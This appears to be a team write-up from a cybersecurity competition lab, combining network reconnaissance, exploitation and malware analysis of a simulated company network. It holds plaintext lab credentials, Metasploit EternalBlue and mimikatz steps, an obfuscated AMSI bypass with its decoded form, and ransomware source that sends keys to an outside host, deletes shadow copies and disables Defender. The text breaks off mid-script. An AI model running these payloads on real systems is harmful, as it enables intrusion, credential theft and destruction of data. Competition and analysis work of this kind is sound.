# НТО

https://github.com/ArturLukianov/nto

---

## Today

Today we found traf.pcap on 10.7.1.254:home/user. We downloaded this file and found encryptor code in it.

![](https://media.discordapp.net/attachments/949564455807774735/952084681396989982/unknown.png)

But we couldn't decrypt this flag.

![](https://media.discordapp.net/attachments/949564455807774735/952104437508350003/unknown.png)

We decrypted a flag: Ex minimis seminibus nascuntur ingentia.

The encrypted file was on a machine with IP 10.7.239.6. It had been encrypted using AES-256 in CBC mode. In the HTTP traffic we could find the key and IV. The key that was used:

```
SSxL4Qg//ErUxRqy25q4h4QVKWl8x5DxjvSVl+1fEsQ
```

We found out that the attacker used the Zerologon exploit. We can state this because of event 4742 in the log file.

We also found 7 stages that the attacker performed to attack the computers. We wrote them into a form on the site.

We wrote and applied rules to the Suricata IDS. The rules can be found in the Cyber Killchain report.

P.S. Some files we used can be found on our GitHub: https://github.com/ArturLukianov/nto

---

## Domain info

Forest: company.local
NS: ns1.company.local, ns2.company.local

Hosts vulnerable to EternalBlue: 10.7.2.12, 10.7.4.8, 10.7.239.6, 10.7.240.14

We used secretsdump.py from impacket to dump domain credentials:

cloudbase-init:59dZMVxSDcGu9eJdPJvN

## Loot

Creds from /etc/shadow:

From|Login|Password
-|-|-
ALL|cadm|pathGlobA11
10.7.2.10, 10.7.2.11|admin|Ronaldo7
10.7.2.10|debian|honey06
10.7.2.11|debian|--
10.7.2.53|admin|--

Creds from the domain controller:

From|Login|Password
-|-|-
domain|ivanov|P@ssw0rd1
domain|Administrator|Server1
domain|Exch_srv|Passw0rd123
domain|petrov|P@ssw0rd2
domain|cadm|pathGlobA11

## DMZ (10.7.2.0/24)

### 10.7.2.10

PORT|SERVICE|VERSION
-|-|-
22/tcp|ssh|OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp|http|nginx 1.14.2 Wordpress
3306/tcp|mysql|PostgreSQL (unauthorized)
8080/tcp|http|nginx 1.14.2 Flask
33060|mysql|MySQL

The application on 8080 has a filter for SQL injections, but it is weak and can be bypassed.

Wordpress weak credentials: admin:admin

The Wordpress access log is at `/var/log/nginx/wordpress_access.log`. Only two IPs accessed the server:

- 192.168.122.1: the admin's IP (installed Wordpress initially)
- 192.168.224.254: from this IP we can see a file upload to the WP File Manager, so we can assume this is the attacker

192.168.224.254 logged in and uploaded files to the Wordpress file manager, but there are no requests to x.php or test1.php from this IP.

Database credentials: wpuser:mypassword

![](https://i.imgur.com/o6X6mtZ.png)

Some suspicious files in /wp-content/plugins/wp-file-manager/lib/files:

![](https://i.imgur.com/P17JDbm.png)

test1.php is a web shell:

![](https://i.imgur.com/7e9iD4G.png)

and x.php is a PNG with an embedded PHP shell:

![](https://i.imgur.com/QcgAKsf.png)

![](https://i.imgur.com/GSZrJnC.png)

After getting inside we can find that sudo python is allowed for www-data:

![](https://i.imgur.com/iFxDXxp.png)

Reference: https://gtfobins.github.io/gtfobins/python/#sudo

![](https://i.imgur.com/cIGY7X1.png)

admin installed policykit:

![](https://i.imgur.com/QqcgxrQ.png)

This version is vulnerable to the exploit https://www.exploit-db.com/exploits/50689

Passwords for admin and debian are weak and can be found in rockyou.txt

![](https://i.imgur.com/N63Lu5L.png)

### 10.7.2.11

PORT|SERVICE|VERSION
-|-|-
22/tcp|ssh|OpenSSH 6.7p1 Debian 5 (protocol 2.0)
80/tcp|http|Apache httpd 2.4.10 ((Debian)) Drupal (CyberPolygon)
139/tcp|netbios-ssn|Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp|netbios-ssn|Samba smbd 4.2.14-Debian (workgroup: WORKGROUP)

Hostname: CLEAN-DRUPAL (Debian)

Samba:

```
Sharename       Type      Comment
---------       ----      -------
print$          Disk      Printer Drivers
IPC$            IPC       IPC Service (Samba 4.2.14-Debian)
```

After login with cadm:pathToGlobA11 we see this message:

> Oh! Hello there! You've been infected by GachiRansom, send 300$ to paypal:b.harrington@gmail.com to get your unecnryption key.

![](https://i.imgur.com/m5nP7uC.png)

There are some encrypted files (.encr), sploit (exploit?) and chisel (TCP/UDP tunnel).

VirusTotal identifies sploit as an exploit for CVE-2016-5195 (Dirty COW).

![](https://i.imgur.com/gnGhJvi.png)

We found a working tunnel and revealed the IP address of the attacker: 10.7.200.50

Database password: drupaluser:DruP@ss531

There are two users:

login|hash|email
-|-|-
admin | $S$DrjhY9H/SDz7/hZ4sJp2KiQWx3/ldBEFaCJQK0DUyRRyeHR6W3zw | svc-cyber-mail@rt-solar.ru
user1 | $S$DCWEfhlKrg8bKCI9TJSn7hVyjp05ktwnM6KlHC4wRE0scj1CBbaN | user1@server.example

### 10.7.2.12

PORT|SERVICE|VERSION
--|--|--
22|ssh|OpenSSH for_Windows_8.6 (protocol 2.0)
25|smtp|SLmail smtpd 5.5.0.4433
79|finger|SLMail fingerd
106|pop3pw|SLMail pop3pw
110|pop3|BVRP Software SLMAIL pop3d
135|msrpc|Microsoft Windows RPC
139|netbios-ssn|Microsoft Windows netbios-ssn
445|microsoft-ds|Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389|tcpwrapped|
49152|msrpc|Microsoft Windows RPC
49153|msrpc|Microsoft Windows RPC
49154|msrpc|Microsoft Windows RPC
49155|msrpc|Microsoft Windows RPC
49156|msrpc|Microsoft Windows RPC
49159|msrpc|Microsoft Windows RPC

Hostname: ARAM-SLMAIL (openstacklocal)

Vulnerable to EternalBlue:

```
msfconsole
> search eternal
> use 0
> set rhosts 10.7.2.12
> run
```

![](https://i.imgur.com/s4fmFSR.png)

### 10.7.2.53

PORT|SERVICE|VERSION
--|--|--
22|ssh|OpenSSH 8.4p1 Debian 5 (protocol 2.0)
80|http|nginx 1.18.0
8080|http|nginx 1.18.0

Contains critical information in the DB:

![](https://i.imgur.com/TpnvGYG.png)

![](https://i.imgur.com/M28zw40.png)

Passwords:

```
+--------------+----------------+
| privateLogin | password       |
+--------------+----------------+
| m.astahov    | Gdtfh677fhm    |
| d.secunova   | 44445qwerty    |
| i.shpagin    | 4815162342     |
| g.sergeeva   | qwertyuiop[]   |
| a.yandutova  | zxcvbnmqazwsx  |
| m.tsarev     | passWWord      |
| m.zodorina   | qazwsxedcrfv   |
| k.pchelkin   | VyregNN@#gdh.! |
| l.izofatova  | yhUJbbndt^%4sh |
| a.golubev    | 67Tgb89UJm     |
+--------------+----------------+
```

## SERVERS (10.7.3.0/24)

### 10.7.3.10

PORT|SERVICE|VERSION
--|--|--
53|domain|Simple DNS Plus
88|kerberos-sec|Microsoft Windows Kerberos (server time: 2022-03-10 10:11:26Z)
135|msrpc|Microsoft Windows RPC
139|netbios-ssn|Microsoft Windows netbios-ssn
389|ldap|Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
445|microsoft-ds?|
464|kpasswd5?|
593|ncacn_http|Microsoft Windows RPC over HTTP 1.0
636|tcpwrapped|
3268|ldap|Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
3269|tcpwrapped|
3389|ms-wbt-server|Microsoft Terminal Services

OS: Windows 10
Hostname: ns2.company.local

### 10.7.3.20

PORT|SERVICE|VERSION
--|--|--
25|smtp|Microsoft Exchange smtpd
80|http|Microsoft IIS httpd 10.0
81|http|Microsoft IIS httpd 10.0
110|pop3|Microsoft Exchange 2007-2010 pop3d
135|msrpc|Microsoft Windows RPC
139|netbios-ssn|Microsoft Windows netbios-ssn
143|imap|Microsoft Exchange 2007-2010 imapd
443|ssl/http|Microsoft IIS httpd 10.0
444|ssl/http|Microsoft IIS httpd 10.0
445|microsoft-ds?|
587|smtp|Microsoft Exchange smtpd
593|ncacn_http|Microsoft Windows RPC over HTTP 1.0
808|ccproxy-http?|
993|ssl/imap|Microsoft Exchange 2007-2010 imapd
995|ssl/pop3|Microsoft Exchange 2007-2010 pop3d
1801|msmq?|
2103|msrpc|Microsoft Windows RPC
2105|msrpc|Microsoft Windows RPC
2107|msrpc|Microsoft Windows RPC
3389|ms-wbt-server|Microsoft Terminal Services
3800|http|Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3801|mc-nmf|.NET Message Framing
3828|mc-nmf|.NET Message Framing
6001|ncacn_http|Microsoft Windows RPC over HTTP 1.0
6502|msrpc|Microsoft Windows RPC

OS: Windows 10
Hostname: mx1.company.local

### 10.7.3.50

PORT|SERVICE|VERSION
--|--|--
53|domain|Simple DNS Plus
88|kerberos-sec|Microsoft Windows Kerberos (server time: 2022-03-10 10:33:13Z)
135|msrpc|Microsoft Windows RPC
139|netbios-ssn|Microsoft Windows netbios-ssn
389|ldap|Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
445|microsoft-ds?|
464|kpasswd5?|
593|ncacn_http|Microsoft Windows RPC over HTTP 1.0
636|tcpwrapped|
3268|ldap|Microsoft Windows Active Directory LDAP (Domain: company.local0., Site: Default-First-Site-Name)
3269|tcpwrapped|
3389|ms-wbt-server|Microsoft Terminal Services

OS: Windows 10
Hostname: ns1.company.local

## OFFICE (10.7.4.0/24)

Host|IP
-|-
custarm.company.local|10.7.4.6
BUCHGARM.company.local|10.7.4.8
sysadminarm.company.local|10.7.4.10
enggeneral.company.local|10.7.4.13

### 10.7.4.6

```
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: company
|   NetBIOS_Domain_Name: company
|   NetBIOS_Computer_Name: CUSTARM
|   DNS_Domain_Name: company.local
|   DNS_Computer_Name: custarm.company.local
|   DNS_Tree_Name: company.local
|   Product_Version: 10.0.17763
|_  System_Time: 2022-03-10T05:42:06+00:00
|_ssl-date: 2022-03-10T05:42:14+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=custarm.company.local
| Issuer: commonName=custarm.company.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-15T12:20:01
| Not valid after:  2022-08-17T12:20:01
| MD5:   9d6a dc1f f2ce d5f2 23b3 6c23 f7d2 0fd5
|_SHA-1: ab86 e352 5ebf 1a72 132d 1913 d358 6782 4dbd d38f
```

Hostname: custarm.company.local

Services:

Port|Service
-|-
3389|RDP
445|SMB

### 10.7.4.8

```
PORT      STATE SERVICE       VERSION
22/tcp    open  ssh           OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
|   3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
|   256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_  256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company)
3389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=BUCHGARM.company.local
| Issuer: commonName=BUCHGARM.company.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-02-15T12:20:09
| Not valid after:  2022-08-17T12:20:09
| MD5:   a3f1 4a74 ad7b bc1d cd85 12b5 a229 ed8b
|_SHA-1: 458f 268e 5e2e 0270 dc52 9d4e 913c 402a 850e 929a
| rdp-ntlm-info:
|   Target_Name: company
|   NetBIOS_Domain_Name: company
|   NetBIOS_Computer_Name: BUCHGARM
|   DNS_Domain_Name: company.local
|   DNS_Computer_Name: BUCHGARM.company.local
|   DNS_Tree_Name: company.local
|   Product_Version: 6.1.7601
|_  System_Time: 2022-03-10T05:43:44+00:00
|_ssl-date: 2022-03-10T05:43:59+00:00; 0s from scanner time.
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49176/tcp open  msrpc         Microsoft Windows RPC
```

Hostname: BUCHGARM.company.local
OS: Windows 7 Professional 7601 Service Pack 1

Services:

Port|Service
-|-
3389|RDP
445|SMB
22|SSH

Vulnerable to EternalBlue:

```
msfconsole
> search eternal
> use 0
> set rhosts 10.7.4.8
> run
```

![](https://i.imgur.com/pxc5jEb.png)

Dumping creds via mimikatz:

```
> load kiwi
> creds_all
...
BUCHGARM$  company  ,FhxL,6>/_0zE5D`18RNSxi`[/=]bm7;DR:w+8PInFb*#<w(N57^W"`_x\qG$k6#7,BMVeKzV5f!!M[b4+0C5,H`<>Fqg<reOHhUW=/=wB7X%[El[]frMhqu
...
```

![](https://i.imgur.com/l7hGwy5.png)

(It's a computer account.)

Domain user found: cadm

cadm is a domain admin. Shortest paths:

![](https://i.imgur.com/hq1zXOl.png)

Upload PowerView to gather info about the domain:

```
> upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
> load powershell
> powershell_shell
Import-Module .\PowerView.ps1
```

SPNs (kerberoastable):

![](https://i.imgur.com/njr2lIF.png)

kadmin/changepw

### 10.7.4.10

```
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: company
|   NetBIOS_Domain_Name: company
|   NetBIOS_Computer_Name: SYSADMINARM
|   DNS_Domain_Name: company.local
|   DNS_Computer_Name: sysadminarm.company.local
|   DNS_Tree_Name: company.local
|   Product_Version: 10.0.17763
|_  System_Time: 2022-03-10T05:55:18+00:00
| ssl-cert: Subject: commonName=sysadminarm.company.local
| Issuer: commonName=sysadminarm.company.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-02-15T12:20:01
| Not valid after:  2022-08-17T12:20:01
| MD5:   ff95 b689 f1fc 6daf dcd6 5a3c 788e f750
|_SHA-1: 79f5 01e4 cb05 5c11 7eb6 761a 9392 dddf deb5 e9a0
|_ssl-date: 2022-03-10T05:55:26+00:00; 0s from scanner time.
```

Hostname: sysadminarm.company.local

Services:

Port|Service
-|-
3389|RDP
445|SMB

### 10.7.4.13

Hostname: enggeneral.company.local

Services:

Port|Service
-|-
3389|RDP
445|SMB

## ICS (10.7.239.0/24, 10.7.240.0/24)

### 10.7.239.0/24

#### 10.7.239.12

```
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
|   3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
|   256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_  256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
80/tcp    open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company)
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2012 11.00.7001.00; SP4
| ms-sql-ntlm-info:
|   Target_Name: company
|   NetBIOS_Domain_Name: company
|   NetBIOS_Computer_Name: OIK-SERVER
|   DNS_Domain_Name: company.local
|   DNS_Computer_Name: OIK-SERVER.company.local
|   DNS_Tree_Name: company.local
|_  Product_Version: 6.1.7601
|_ssl-date: 2022-03-10T10:12:24+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-02-18T08:49:21
|_Not valid after:  2052-02-18T08:49:21
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info:
|   Target_Name: company
|   NetBIOS_Domain_Name: company
|   NetBIOS_Computer_Name: OIK-SERVER
|   DNS_Domain_Name: company.local
|   DNS_Computer_Name: OIK-SERVER.company.local
|   DNS_Tree_Name: company.local
|   Product_Version: 6.1.7601
|_  System_Time: 2022-03-10T10:12:17+00:00
|_ssl-date: 2022-03-10T10:12:24+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=OIK-SERVER.company.local
| Not valid before: 2022-02-15T12:20:47
|_Not valid after:  2022-08-17T12:20:47
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: OIK-SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2022-03-10T10:12:16
|_  start_date: 2022-02-18T08:49:22
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: OIK-SERVER
|   NetBIOS computer name: OIK-SERVER\x00
|   Domain name: company.local
|   Forest name: company.local
|   FQDN: OIK-SERVER.company.local
|_  System time: 2022-03-10T13:12:16+03:00
| ms-sql-info:
|   10.7.239.5:1433:
|     Version:
|       name: Microsoft SQL Server 2012 SP4
|       number: 11.00.7001.00
|       Product: Microsoft SQL Server 2012
|       Service pack level: SP4
|       Post-SP patches applied: false
|_    TCP port: 1433
|_clock-skew: mean: -25m42s, deviation: 1h08m01s, median: 0s
|_nbstat: NetBIOS name: OIK-SERVER, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:82:0e:3f (unknown)
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
```

#### 10.7.239.6

```
Host script results:
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required
| smb-os-discovery:
```

PORT|SERVICE|VERSION
--|--|--
22|ssh|OpenSSH for_Windows_8.6 (protocol 2.0)
135|msrpc|Microsoft Windows RPC
139|netbios-ssn|Microsoft Windows netbios-ssn
445|microsoft-ds|Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: company)
3389|ssl/ms-wbt-server?|
49152|msrpc|Microsoft Windows RPC
49153|msrpc|Microsoft Windows RPC
49154|msrpc|Microsoft Windows RPC
49175|msrpc|Microsoft Windows RPC

OS: Windows 7
Hostname: OIK-CLIENT.company.local

Vulnerable to EternalBlue.

Dumping creds:

![](https://i.imgur.com/KhBqDPc.png)

Administrator:Server1

But these creds are not valid.

### 10.7.240.0/24

#### 10.7.240.5

```
Host is up (0.0073s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 06:da:27:f3:fa:ba:ad:7b:a4:88:2c:94:ae:e6:1d:54 (RSA)
|   256 79:83:2d:02:3f:b0:30:e2:54:51:1d:34:b3:2a:c6:a5 (ECDSA)
|_  256 a1:34:1b:fb:fd:f7:ff:33:46:b8:be:70:b8:a3:d0:7d (ED25519)
80/tcp open  http    JBoss Enterprise Application Platform
|_http-title: SIEDWEB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

#### 10.7.240.6

```
Host is up (0.0077s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2a:5b:b2:e1:52:b4:e9:cc:f7:69:5a:d6:75:ca:74:e1 (RSA)
|   256 f9:dd:de:ed:2f:98:3e:a0:60:6d:2f:4d:bf:fa:40:35 (ECDSA)
|_  256 82:82:3d:74:1b:f1:9f:76:b5:38:64:42:c0:91:37:49 (ED25519)
80/tcp open  http    JBoss Enterprise Application Platform
|_http-title: SIEDWEB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

#### 10.7.240.9

```
Host is up (0.0080s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 0e:95:fa:3e:46:58:a8:2e:62:7d:7b:50:fe:9e:40:eb (RSA)
|   256 3a:23:e6:f4:fe:db:59:f1:eb:4d:2a:15:a0:24:8b:a6 (ECDSA)
|_  256 5d:19:78:f8:84:76:96:e3:a1:2c:fb:5f:2c:78:0b:51 (ED25519)
80/tcp open  http    JBoss Enterprise Application Platform
|_http-title: SIEDWEB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

#### 10.7.240.10

```
Host is up (0.0060s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 03:16:1f:5e:73:5b:71:6e:c6:66:13:0c:c3:85:9e:16 (RSA)
|   256 5f:88:7a:ab:c9:f4:91:02:1d:56:e1:d1:59:19:30:30 (ECDSA)
|_  256 4c:c3:86:76:6e:67:74:be:dc:42:9d:49:e9:38:f7:a1 (ED25519)
80/tcp open  http    JBoss Enterprise Application Platform
|_http-title: SIEDWEB
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

#### 10.7.240.14

```
Host is up (0.0068s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT      STATE SERVICE            VERSION
22/tcp    open  ssh                OpenSSH for_Windows_8.6 (protocol 2.0)
| ssh-hostkey:
|   3072 23:18:fc:38:62:8f:3d:aa:48:f3:f0:48:8d:17:c5:55 (RSA)
|   256 1b:ba:74:cf:1b:cd:36:cf:0c:09:c1:f3:e4:d3:d0:7f (ECDSA)
|_  256 49:0f:d6:2a:5b:fd:ec:04:ed:17:5a:8f:0b:a4:1d:77 (ED25519)
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=aram-entek
| Not valid before: 2022-02-14T16:18:27
|_Not valid after:  2022-08-16T16:18:27
|_ssl-date: 2022-03-10T10:40:50+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: ARAM-ENTEK
|   NetBIOS_Domain_Name: ARAM-ENTEK
|   NetBIOS_Computer_Name: ARAM-ENTEK
|   DNS_Domain_Name: aram-entek
|   DNS_Computer_Name: aram-entek
|   Product_Version: 6.1.7601
|_  System_Time: 2022-03-10T10:40:41+00:00
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49157/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: ARAM-ENTEK; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: aram-entek
|   NetBIOS computer name: ARAM-ENTEK\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-03-10T13:40:41+03:00
|_nbstat: NetBIOS name: ARAM-ENTEK, NetBIOS user: <unknown>, NetBIOS MAC: fa:16:3e:96:72:de (unknown)
| smb2-time:
|   date: 2022-03-10T10:40:42
|_  start_date: 2022-02-15T16:19:24
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -35m59s, deviation: 1h20m29s, median: 0s
| smb2-security-mode:
|   2.1:
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (9 hosts up) scanned in 84.26 seconds
```

Vulnerable to EternalBlue

![](https://i.imgur.com/D1XDeFf.png)

Dumping creds:

![](https://i.imgur.com/0LZAUJ9.png)

cadm:pathGlobA11

These credentials allow us to log in to the DC with Domain Admins privileges.

## Malware analysis

### WinServ.exe

![](https://i.imgur.com/AwclJaM.png)

Suspicious file (possibly compiled Python) on 10.7.3.10.

The executable was unpacked using pyinstxtractor, then the compiled Python was decompiled using pycdc.

Python-compiled malware. Actions:
1. Search for uninfected hosts in the hosts list by checking if port 3389 is open
2. Brute-force the Administrator password from a list of passwords over NTLM
3. Start an HTTP server on the already infected machine
4. Execute a PowerShell script that downloads WinServ.exe from the infected machine onto the victim machine
5. Execute a second PowerShell script that starts the downloaded WinServ.exe

List of passwords:

```
Florida1
#1monkey
Blondie1
Brandy1
Charles1
Cowboys1
Eminem1
Justice1
Password12
Pepper1
Pr1ncess
Sophie1
Special1
Thumper1
Thunder1
Tristan1
Houston1
Jeffrey1
Johnny1
Savannah1
Spencer1
Sweet16
football#1
lucky#13
monkey#1
po#34tato
zaq1!QAZ
100%cool
Barbie1
```

![](https://i.imgur.com/lw899d3.png)

---

```powershell
( ([stRiNg]$VErbOSePREFereNCe)[1,3]+'x'-JOin'')( -jOiN ( '91W78&101T116&46&83T101:114x118T105T99:101r80:111r105x110-116:77&97&110-97{103H101W114W93T58-58W83:101r114T118W101W114T67{101x114W116{105:102T105r99&97:116x101x86x97T108{105:100H97r116T105x111x110x67H97H108x108&98:97H99T107x32-61T32:123:36-116W114r117r101W125&10{116T114H121-123:10{91&82x101:102T93:46&65H115&115:101T109&98H108W121{46H71x101-116r84T121W112-101x40x39T83-121H115:39r43T39{116-101{109H46x77-97&110:39{43T39:97-103{101T109:101{110T116{46:65W117W116T39{43x39&111-109r97W116-105&111-110-46x65T109x39-43:39x115x105r85T116H39H43:39x105x108&115{39H41-46W71T101H116&70r105{101r108:100T40-39x97{109T39-43T39W115x105W73x110W105&39T43&39{116x70r97H105x108x101H100{39H44&32W39r78{111x110&80x39x43W39H117H98x108-105H99{44T83x116x97x39:43T39x116r105r99W39x41x46x83H101W116H86{97-108:117x101r40H36:110&117x108W108x44T32W36:116T114&117&101H41x10T125-99:97&116T99T104W123-125T10{114x101-115W116T97H114{116W45&99r111H109&112x117:116H101x114:32x45x102' -SPLIT'x' -Split'x' -spLIT 'r'-sPlIt'W' -SplIt '-' -sPlIT'T' -SpLit':'-SPlit '{'-splIT'H' -SPlit '&' | fOrEACh { ([CHaR][inT]$_)}) )
```

Decoded, the character codes above give:

```powershell
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
restart-computer -f
```

Logging evasion:

```powershell
# accept any TLS certificate for the downloads that follow
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try {
    # sets AmsiUtils.amsiInitFailed so AMSI stops scanning this process
    [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
} catch {}
restart-computer -f
```

---

Encryptor found on 10.7.239.6:

```powershell
function Ransom {
    Param(
        [Parameter(Position = 0)]
        [String] $IP='127.0.0.1'
    )
    # AES-256-CBC with zero padding; a fresh random key is generated per run
    $aesManaged=new-object "System.Security.Cryptography.AesManaged";
    $aesManaged.Mode=[System.Security.Cryptography.CipherMode]::CBC;
    $aesManaged.Padding=[System.Security.Cryptography.PaddingMode]::Zeros;
    $aesManaged.BlockSize=128;
    $aesManaged.KeySize=256;
    $aesManaged.GenerateKey();
    $IV = [System.Convert]::ToBase64String($aesManaged.IV);
    $key = [System.Convert]::ToBase64String($aesManaged.Key);
    # check-in: key, IV and hostname leave in the query string of a plain HTTP GET
    $URL="http://$IP/key=$Key&iv=$IV&pc=$env:computername";
    try { Invoke-WebRequest $URL } catch { $_.Exception.Response.StatusCode.Value__}
    # ransom wallpaper
    $background = "http://$IP/wall.jpg"
    Invoke-WebRequest -Uri $background -OutFile "/users/$env:USERNAME/wall.jpg"
    Start-Sleep -s 2
    $wallpaper = "C:/users/$env:USERNAME/wall.jpg"
    Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name Wallpaper -value "$wallpaper"
    Set-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -value "10"
    Start-Sleep -s 2
    rundll32.exe user32.dll, UpdatePerUserSystemParameters, 1 , $False
    # destroy shadow copies and boot recovery, then disable VSS, Security Center,
    # Defender, Windows Update, BITS and error reporting
    vssadmin delete shadows /all /quiet;
    spsv vss -ErrorAction SilentlyContinue;
    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='vss'").StartMode) -ne "Disabled"){ set-service vss -StartupType Disabled};
    bcdedit /set recoveryenabled No|Out-Null;
    bcdedit /set bootstatuspolicy ignoreallfailures|Out-Null;
    spsv Wscsvc -ErrorAction SilentlyContinue;
    if(((gwmi -Query "Select StartMode From Win32_Service Where Name='Wscsvc'").StartMode) -ne "Disabled"){ set-service Wscsvc -StartupType Disabled};
    spsv WinDefend -ErrorAction SilentlyContinue;
